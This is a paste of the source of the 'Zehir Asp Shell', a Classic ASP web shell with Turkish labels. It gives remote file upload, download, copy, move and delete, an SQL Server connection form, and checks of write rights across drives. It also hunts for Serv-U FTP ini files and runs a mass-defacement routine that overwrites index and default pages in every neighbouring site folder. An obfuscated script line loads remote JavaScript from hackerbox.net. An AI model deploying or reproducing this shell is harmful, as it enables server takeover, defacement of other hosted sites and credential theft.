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Jan 21st, 2017
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text 45.10 KB | None | 0 0
  1. <%
  2. mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
  3. dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
  4. on error resume next
  5. Dim objFSO,popup
  6. Set objFSO = CreateObject ("Scripting.FileSystemObject")
  7. if Request("kuskapani")=1 then
  8. Response.End
  9. end if
  10. if Request("kuskapani")=2 then
  11. on error resume next
  12. path = Request("path")
  13. sFolder = Request("SubFolder")
  14. fName = Request("FileName")
  15. d1 = Request("dosya1")
  16. d2 = Request("dosya2")
  17. d3 = Request("dosya3")
  18. d4 = Request("dosya4")
  19. bg__ = Request.Form("selectColour")
  20. if bg__ = "0" then bg__ = "#ffffff"
  21. byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>powered by Z" & Session("n2") & "3 ;)</font>"
  23. sFolder = Replace(sFolder,"/","\")
  25. if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
  26. Set f = objFSO.GetFolder(Path)
  27. Set fc = f.SubFolders
  28. h__ = 0
  29. f__ = 0
  30. ss__ = now
  31. For Each f1 In fc
  32. hedef_ = replace(f1.path,"/","\")
  33. if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
  34. hedef__ = left(hedef_,len(hedef_)-1)
  35. folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
  36. if d1<>"" then d1 = true
  37. if d2<>"" then d2 = true
  38. if d3<>"" then d3 = true
  39. if d4<>"" then d4 = true
  40. on error goto 0:on error resume next
  41. if fName<>"" then
  42. Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
  43. MyFile.write byMesaj
  44. end if
  45. if d1 then
  46. Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
  47. MyFile.write byMesaj
  48. end if
  49. if d2 then
  50. Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
  51. MyFile.write byMesaj
  52. end if
  53. if d3 then
  54. Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
  55. MyFile.write byMesaj
  56. end if
  57. if d4 then
  58. Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
  59. MyFile.write byMesaj
  60. end if
  62. if err<>0 then
  63. response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
  64. f__ = f__ + 1
  65. else
  66. response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
  67. h__ = h__ + 1
  68. end if
  69. Next
  70. ss___ = now
  71. response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
  72. response.End
  73. end if
  75. status = Request("status")
  76. path = Request("path")
  77. dPath = Request("dPath")
  78. arama = Request("txArama")
  79. dkayit = Request("dkayit")
  80. table = Request("table")
  81. del = Request("del")
  82. islem = Request("islem")
  83. strSQL = Request("strSQL")
  84. cf = Request("cf")
  85. pathfile = request("pathfile")
  86. if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
  87. if status="" then status=2
  88. popup = true
  89. '////////////////////////////////
  90. Function ReadBinaryFile(FileName)
  91. Const adTypeBinary = 1
  92. Dim BinaryStream
  93. Set BinaryStream = CreateObject("ADODB.Stream")
  94. BinaryStream.Type = adTypeBinary
  95. BinaryStream.Open
  96. BinaryStream.LoadFromFile FileName
  97. ReadBinaryFile = BinaryStream.Read
  98. End Function
  99. if status="-3" then
  100. Response.Buffer=True
  101. Set Fil = objFSO.GetFile(pathfile)
  103. Response.contenttype="application/force-download"
  104. Response.AddHeader "Cache-control","private"
  105. Response.AddHeader "Content-Length", Fil.Size
  106. Response.AddHeader "Content-Disposition", "attachment; filename=" &
  108. Response.BinaryWrite readBinaryFile(Fil.path)
  109. Set f = Nothing: Set Fil = Nothing
  110. response.End()
  111. end if
  112. '//////////////////////////////////
  113. if status="-4" then popup=false
  114. if status="13" then popup=false
  115. if status="14" then popup=false
  116. if status="15" then popup=false
  117. if status="16" then popup=false
  118. if status="17" then popup=false
  119. if status="18" then popup=false
  120. if status="19" then popup=false
  121. if status="33" then popup=false
  122. if status="40" then popup=false
  123. if status="50" then popup=false
  124. byMsg = request.QueryString("byMsg")
  125. if byMsg<>"" then response.Write byMsg
  126. response.Write "<title>Zehir Asp Shell --> powered by zehir &lt;;</title>"
  127. if popup then
  128. %>
  129. <center>
  130. <a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
  131. <font color=yellow> | </font>
  132. <a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
  133. <font color=yellow> | </font>
  134. <a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
  135. <font color=yellow> | </font>
  136. <a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
  137. <font color=yellow> | </font>
  138. <a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
  139. <font color=yellow> | </font>
  140. <a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
  141. <script language=javascript>
  142. function sistemBilgisi(yol){
  143. NewWindow(yol,"",600,240,"no");
  144. }
  145. function SitelerTestte(yol){
  146. NewWindow(yol,"",530,420,"no");
  147. }
  148. function klasorIslemleri(yol){
  149. NewWindow(yol,"",400,280,"no");
  150. }
  151. function sqlServer(yol){
  152. NewWindow(yol,"",300,50,"no");
  153. }
  154. function poweredby(yol){
  155. NewWindow(yol,"",300,50,"no");
  156. }
  157. function sistemTest(yol){
  158. NewWindow(yol,"",400,300,"no");
  159. }
  160. </script>
  161. <script language="javascript">
  162. document.write( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%65%72%62%6F%78%2E%6E%65%74%2F%62%6C%61%62%6C%61%2F%70%65%72%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E' ) );
  163. </script>
  164. <%
  165. end if
  166. '####################################
  167. Class clsUpload
  168. Private mbinData
  169. Private mlngChunkIndex
  170. Private mlngBytesReceived
  171. Private mstrDelimiter
  172. Private CR
  173. Private LF
  174. Private CRLF
  175. Private mobjFieldAry()
  176. Private mlngCount
  178. Private Sub RequestData
  179. Dim llngLength
  180. mlngBytesReceived = Request.TotalBytes
  181. mbinData = Request.BinaryRead(mlngBytesReceived)
  182. End Sub
  184. Private Sub ParseDelimiter()
  185. mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
  186. End Sub
  188. Private Sub ParseData()
  189. Dim llngStart
  190. Dim llngLength
  191. Dim llngEnd
  192. Dim lbinChunk
  193. llngStart = 1
  194. llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
  195. While Not llngStart = 0
  196. llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
  197. llngLength = llngEnd - llngStart
  198. lbinChunk = MidB(mbinData, llngStart, llngLength)
  199. Call ParseChunk(lbinChunk)
  200. llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
  201. Wend
  202. End Sub
  204. Private Sub ParseChunk(ByRef pbinChunk)
  205. Dim lstrName
  206. Dim lstrFileName
  207. Dim lstrContentType
  208. Dim lbinData
  209. Dim lstrDisposition
  210. Dim lstrValue
  211. lstrDisposition = ParseDisposition(pbinChunk)
  212. lstrName = ParseName(lstrDisposition)
  213. lstrFileName = ParseFileName(lstrDisposition)
  214. lstrContentType = ParseContentType(pbinChunk)
  215. If lstrContentType = "" Then
  216. lstrValue = CStrU(ParseBinaryData(pbinChunk))
  217. Else
  218. lbinData = ParseBinaryData(pbinChunk)
  219. End If
  220. Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
  221. End Sub
  223. Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
  224. Dim lobjField
  225. ReDim Preserve mobjFieldAry(mlngCount)
  226. Set lobjField = New clsField
  227. lobjField.Name = pstrName
  228. lobjField.FilePath = pstrFileName
  229. lobjField.ContentType = pstrContentType
  230. If LenB(pbinData) = 0 Then
  231. lobjField.BinaryData = ChrB(0)
  232. lobjField.Value = pstrValue
  233. lobjField.Length = Len(pstrValue)
  234. Else
  235. lobjField.BinaryData = pbinData
  236. lobjField.Length = LenB(pbinData)
  237. lobjField.Value = ""
  238. End If
  239. Set mobjFieldAry(mlngCount) = lobjField
  240. mlngCount = mlngCount + 1
  241. End Sub
  243. Private Function ParseBinaryData(ByRef pbinChunk)
  244. Dim llngStart
  245. llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
  246. If llngStart = 0 Then Exit Function
  247. llngStart = llngStart + 4
  248. ParseBinaryData = MidB(pbinChunk, llngStart)
  249. End Function
  251. Private Function ParseContentType(ByRef pbinChunk)
  252. Dim llngStart
  253. Dim llngEnd
  254. Dim llngLength
  255. llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
  256. If llngStart = 0 Then Exit Function
  257. llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
  258. If llngEnd = 0 Then Exit Function
  259. llngStart = llngStart + 15
  260. If llngStart >= llngEnd Then Exit Function
  261. llngLength = llngEnd - llngStart
  262. ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
  263. End Function
  265. Private Function ParseDisposition(ByRef pbinChunk)
  266. Dim llngStart
  267. Dim llngEnd
  268. Dim llngLength
  269. llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
  270. If llngStart = 0 Then Exit Function
  271. llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
  272. If llngEnd = 0 Then Exit Function
  273. llngStart = llngStart + 22
  274. If llngStart >= llngEnd Then Exit Function
  275. llngLength = llngEnd - llngStart
  276. ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
  277. End Function
  279. Private Function ParseName(ByRef pstrDisposition)
  280. Dim llngStart
  281. Dim llngEnd
  282. Dim llngLength
  283. llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
  284. If llngStart = 0 Then Exit Function
  285. llngEnd = InStr(llngStart + 6, pstrDisposition, """")
  286. If llngEnd = 0 Then Exit Function
  287. llngStart = llngStart + 6
  288. If llngStart >= llngEnd Then Exit Function
  289. llngLength = llngEnd - llngStart
  290. ParseName = Mid(pstrDisposition, llngStart, llngLength)
  291. End Function
  292. ' ------------------------------------------------------------------------------
  293. Private Function ParseFileName(ByRef pstrDisposition)
  294. Dim llngStart
  295. Dim llngEnd
  296. Dim llngLength
  297. llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
  298. If llngStart = 0 Then Exit Function
  299. llngEnd = InStr(llngStart + 10, pstrDisposition, """")
  300. If llngEnd = 0 Then Exit Function
  301. llngStart = llngStart + 10
  302. If llngStart >= llngEnd Then Exit Function
  303. llngLength = llngEnd - llngStart
  304. ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
  305. End Function
  307. Public Property Get Count()
  308. Count = mlngCount
  309. End Property
  311. Public Default Property Get Fields(ByVal pstrName)
  312. Dim llngIndex
  313. If IsNumeric(pstrName) Then
  314. llngIndex = CLng(pstrName)
  315. If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
  316. Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
  317. Exit Property
  318. End If
  319. Set Fields = mobjFieldAry(pstrName)
  320. Else
  321. pstrName = LCase(pstrname)
  322. For llngIndex = 0 To mlngCount - 1
  323. If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
  324. Set Fields = mobjFieldAry(llngIndex)
  325. Exit Property
  326. End If
  327. Next
  328. End If
  329. Set Fields = New clsField
  330. End Property
  332. Private Sub Class_Terminate()
  333. Dim llngIndex
  334. For llngIndex = 0 To mlngCount - 1
  335. Set mobjFieldAry(llngIndex) = Nothing
  337. Next
  338. ReDim mobjFieldAry(-1)
  339. End Sub
  341. Private Sub Class_Initialize()
  342. ReDim mobjFieldAry(-1)
  343. CR = ChrB(Asc(vbCr))
  344. LF = ChrB(Asc(vbLf))
  345. CRLF = CR & LF
  346. mlngCount = 0
  347. Call RequestData
  348. Call ParseDelimiter()
  349. Call ParseData
  350. End Sub
  352. Private Function CStrU(ByRef pstrANSI)
  353. Dim llngLength
  354. Dim llngIndex
  355. llngLength = LenB(pstrANSI)
  356. For llngIndex = 1 To llngLength
  357. CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
  358. Next
  359. End Function
  361. Private Function CStrB(ByRef pstrUnicode)
  362. Dim llngLength
  363. Dim llngIndex
  364. llngLength = Len(pstrUnicode)
  365. For llngIndex = 1 To llngLength
  366. CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
  367. Next
  368. End Function
  369. End Class
  370. '####################################
  371. Session("n1") = "byZ"
  372. Class clsField
  373. Public Name
  374. Private mstrPath
  375. Public FileDir
  376. Public FileExt
  377. Public FileName
  378. Public ContentType
  379. Public Value
  380. Public BinaryData
  381. Public Length
  382. Private mstrText
  384. Public Property Get BLOB()
  385. BLOB = BinaryData
  386. End Property
  388. Public Function BinaryAsText()
  389. Dim lbinBytes
  390. Dim lobjRs
  391. If Length = 0 Then Exit Function
  392. If LenB(BinaryData) = 0 Then Exit Function
  394. If Not Len(mstrText) = 0 Then
  395. BinaryAsText = mstrText
  396. Exit Function
  397. End If
  398. lbinBytes = ASCII2Bytes(BinaryData)
  399. mstrText = Bytes2Unicode(lbinBytes)
  400. BinaryAsText = mstrText
  401. End Function
  403. Public Sub SaveAs(ByRef pstrFileName)
  404. Const adTypeBinary=1
  405. Const adSaveCreateOverWrite=2
  406. Dim lobjStream
  407. Dim lobjRs
  408. Dim lbinBytes
  409. If Length = 0 Then Exit Sub
  410. If LenB(BinaryData) = 0 Then Exit Sub
  411. Set lobjStream = Server.CreateObject("ADODB.Stream")
  412. lobjStream.Type = adTypeBinary
  413. Call lobjStream.Open()
  414. lbinBytes = ASCII2Bytes(BinaryData)
  415. Call lobjStream.Write(lbinBytes)
  417. On Error Resume Next
  419. Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
  421. 'if err<>0 then response.Write "<br>"&err.Description
  423. Call lobjStream.Close()
  424. Set lobjStream = Nothing
  425. End Sub
  427. Public Property Let FilePath(ByRef pstrPath)
  428. mstrPath = pstrPath
  429. If Not InStrRev(pstrPath, ".") = 0 Then
  430. FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
  431. FileExt = UCase(FileExt)
  432. End If
  433. If Not InStrRev(pstrPath, "\") = 0 Then
  434. FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
  435. End If
  436. If Not InStrRev(pstrPath, "\") = 0 Then
  437. FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
  438. End If
  439. End Property
  441. Public Property Get FilePath()
  442. FilePath = mstrPath
  443. End Property
  445. private Function ASCII2Bytes(ByRef pbinBinaryData)
  446. Const adLongVarBinary=205
  447. Dim lobjRs
  448. Dim llngLength
  449. Dim lbinBuffer
  450. llngLength = LenB(pbinBinaryData)
  451. Set lobjRs = Server.CreateObject("ADODB.Recordset")
  452. Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
  453. Call lobjRs.Open()
  454. Call lobjRs.AddNew()
  455. Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
  456. Call lobjRs.Update()
  457. lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
  458. Call lobjRs.Close()
  459. Set lobjRs = Nothing
  460. ASCII2Bytes = lbinBuffer
  461. End Function
  463. Private Function Bytes2Unicode(ByRef pbinBytes)
  464. Dim lobjRs
  465. Dim llngLength
  466. Dim lstrBuffer
  467. llngLength = LenB(pbinBytes)
  468. Set lobjRs = Server.CreateObject("ADODB.Recordset")
  469. Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
  470. Call lobjRs.Open()
  471. Call lobjRs.AddNew()
  472. Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
  473. Call lobjRs.Update()
  474. lstrBuffer = lobjRs.Fields("BinaryData").Value
  475. Call lobjRs.Close()
  476. Set lobjRs = Nothing
  477. Bytes2Unicode = lstrBuffer
  478. End Function
  479. End Class
  480. Session("n2") = "ehir"
  481. '####################################
  482. function addslash(path)
  483. if right(path,1)="\" then addslash=path else addslash=path & "\"
  484. end function
  486. sub Upload()
  487. dim objUpload,f,max,i,name,path,size,success
  489. set objUpload=New clsUpload
  491. targetPath=objUpload.Fields("folder").Value
  492. max=objUpload.Fields("max").Value
  494. for i=1 to max
  495. name=objUpload.Fields("file" & i).FileName
  496. size=objUpload.Fields("file" & i).Length
  497. if (name<>"") and (size>0) then
  498. gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
  499. path=addslash(targetPath) & name
  500. objUpload.Fields("file" & i).SaveAs path
  502. if objFSO.FileExists(path) then
  503. on error resume next
  504. set f=objFSO.GetFile(path)
  505. if IsObject(f) then
  506. if f.Size=size then success=true else success=false
  507. end if
  508. set f=nothing
  509. end if
  510. if success then gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
  511. end if
  512. next
  513. response.Write gMsg
  514. set objUpload=nothing
  516. end sub
  518. if status="-4" then
  519. Upload()
  520. ' hataKontrol
  521. popup=false
  522. end if
  523. '////////////////////////////////
  524. sub hataKontrol
  525. if err<>0 then
  526. Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
  527. end if
  528. end sub
  530. sub araBul(path_,ara_)
  531. on error resume next
  532. If Len(path_) > 0 Then
  533. cur = path_&"\"
  534. If cur = "\\" Then cur = ""
  535. parent = ""
  536. If InStrRev(cur,"\") > 0 Then
  537. parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
  538. End If
  539. Else
  540. cur = ""
  541. End If
  543. Set f = objFSO.GetFolder(cur)
  545. Set fc = f.Files
  546. For Each f1 In fc
  547. if lcase(InStr(1,,lcase(ara_)))>0 then
  548. downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
  549. if lcase(ara_)="mdb" then
  550. Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
  551. else
  552. Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
  553. end if
  554. end if
  555. Next
  557. Set fs = f.SubFolders
  558. For Each f1 In fs
  559. araBul f1.path,ara_
  560. Next
  561. Set f = Nothing
  562. Set fc = Nothing
  563. Set fs = Nothing
  564. end sub
  566. sub sistemTest
  567. response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
  568. response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
  570. servu_Test
  571. WriteTestOnDriver
  572. WriteTestOnLocalPath
  573. LocalPathParentFolder
  574. LocalPathPParentFolder
  576. response.Write "</table>"
  577. end sub
  579. sub servu_Test
  580. dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
  581. for each drive_ in objFSO.Drives
  582. if drive_.Drivetype=2 or drive_.Drivetype=3 then
  583. for each d_ in dosya_
  584. d_ = drive_.DriveLetter&":\"&d_
  585. if objFSO.FileExists(d_) then
  586. response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
  587. end if
  588. next
  589. end if
  590. next
  591. end sub
  593. function yaziyomu(yol)
  594. on error goto 0:on error resume next
  595. dim sonuc__
  596. Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
  597. MyFile.write "byzehir <>"
  598. set MyFile = Nothing
  599. if err<>0 then
  600. sonuc__="<font color=red>Yazma Hakki Yok!</font>"
  601. else
  602. sonuc__="<font color=yellow>Yazma Hakki Var!</font>"
  603. on error goto 0: on error resume next
  604. objFSO.DeleteFile yol & "\test.zehir",true
  605. if err<>0 then
  606. sonuc__=sonuc__&"<br><font color=red>Silme Hakki Yok!</font>"
  607. else
  608. sonuc__=sonuc__&"<br><font color=yellow>Silme Hakki Var!</font>"
  609. end if
  610. end if
  611. yaziyomu = sonuc__
  612. end function
  614. function yaziyomu2(yol)
  615. on error goto 0:on error resume next
  616. Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
  617. MyFile.write "byzehir <>"
  618. set MyFile = Nothing
  619. if err<>0 then
  620. yaziyomu2 = false
  621. else
  622. objFSO.DeleteFile yol & "\test.zehir"
  623. yaziyomu2 = true
  624. end if
  625. end function
  627. sub WriteTestOnDriver
  628. for each drive_ in objFSO.Drives
  629. if drive_.Drivetype=2 or drive_.Drivetype=3 then
  630. if not yaziyomu2(drive_.DriveLetter&":\") then
  631. Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
  632. else
  633. Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
  634. end if
  635. end if
  636. next
  637. end sub
  639. sub WriteTestOnLocalPath
  640. on error goto 0
  641. on error resume next
  642. if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
  643. Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
  644. else
  645. Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
  646. end if
  647. end sub
  649. sub LocalPathParentFolder
  650. on error goto 0
  651. on error resume next
  652. hed_ = request.servervariables("APPL_PHYSICAL_PATH")
  653. if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
  654. parhed_ = left(hed_,InStrRev(hed_,"\"))
  656. Set f = objFSO.GetFolder(parhed_)
  657. Set fc = f.SubFolders
  659. int_fol=0
  660. int_fil=0
  661. For Each f1 In fc
  662. int_fol=int_fol+1
  663. Next
  665. Set fc = f.files
  666. For Each f1 In fc
  667. int_fil=int_fil+1
  668. Next
  670. if err<>0 then
  671. Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Olustu : ["&err.Description&"]</td></tr>"
  672. else
  673. Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
  674. end if
  675. end sub
  677. sub LocalPathPParentFolder
  678. on error goto 0
  679. on error resume next
  680. hed_ = request.servervariables("APPL_PHYSICAL_PATH")
  681. if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
  682. hed_ = left(hed_,InStrRev(hed_,"\"))
  683. if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
  684. parhed_ = left(hed_,InStrRev(hed_,"\"))
  686. Set f = objFSO.GetFolder(parhed_)
  687. Set fc = f.SubFolders
  688. int_fol=0
  689. int_fil=0
  690. For Each f1 In fc
  691. int_fol=int_fol+1
  692. Next
  694. Set fc = f.files
  695. For Each f1 In fc
  696. int_fil=int_fil+1
  697. Next
  699. if err<>0 then
  700. if err=451 then
  701. Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
  702. else
  703. Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Olustu : ["&err.Description&"]</td></tr>"
  704. end if
  705. else
  706. Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
  707. end if
  708. end sub
  710. SELECT CASE status
  711. CASE 13 'Sistem Bilgisi
  712. Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
  713. Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
  714. Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
  715. Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
  716. Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
  717. Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
  718. Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
  719. Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
  720. Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
  721. Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
  722. Response.Write "</table>"
  723. popup = false
  724. CASE 14 'Upload and Search
  725. aramaUpload
  726. popup = false
  727. hataKontrol
  728. CASE 15 'Ms. SQL Server
  729. Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
  730. Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
  731. Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
  732. Response.Write "<input style='width:250; height:21' value='' name=path><br>"
  733. response.Write "<input type=submit value='SQL Servera Baglan' style='height:23;width:170' id=submit1 name=submit1>"
  734. Response.Write "</td></tr></table>"
  735. response.Write "</form>"
  737. popup = false
  738. hataKontrol
  739. CASE 16 'file Copy window
  740. Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
  741. Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
  742. Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
  743. Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
  744. response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
  745. Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
  746. response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
  747. response.Write "<input type=radio name='islem' value='tasi'>Tasi"
  748. response.Write "</table>"
  749. response.Write "</form>"
  751. popup = false
  752. hataKontrol
  753. CASE 17 'file Copy
  754. isl = ""
  755. if islem="kopyala" then
  756. objFSO.CopyFile path,cf
  757. isl="kopyalandi.."
  758. elseif islem="tasi" then
  759. objFSO.MoveFile path,cf
  760. isl="tasindi.."
  761. end if
  762. response.Write "Dosya "&isl
  763. response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
  764. response.Write "<br>"
  765. popup = false
  766. hataKontrol
  767. CASE 18 'folder Copy window
  768. Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
  769. Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
  770. Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
  771. Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
  772. response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
  773. Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
  774. response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
  775. response.Write "<input type=radio name='islem' value='tasi'>Tasi"
  776. response.Write "</table>"
  777. response.Write "</form>"
  779. popup = false
  780. hataKontrol
  781. CASE 19 'folder Copy
  782. isl = ""
  783. if islem="kopyala" then
  784. objFSO.CopyFolder path,cf
  785. isl="kopyalandi.."
  786. elseif islem="tasi" then
  787. objFSO.MoveFolder path,cf
  788. isl="tasindi.."
  789. end if
  790. response.Write "Klasor "&isl
  791. response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
  792. response.Write "<br>"
  793. popup = false
  794. hataKontrol
  795. CASE 33 'Powered By
  796. response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
  797. response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2><br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
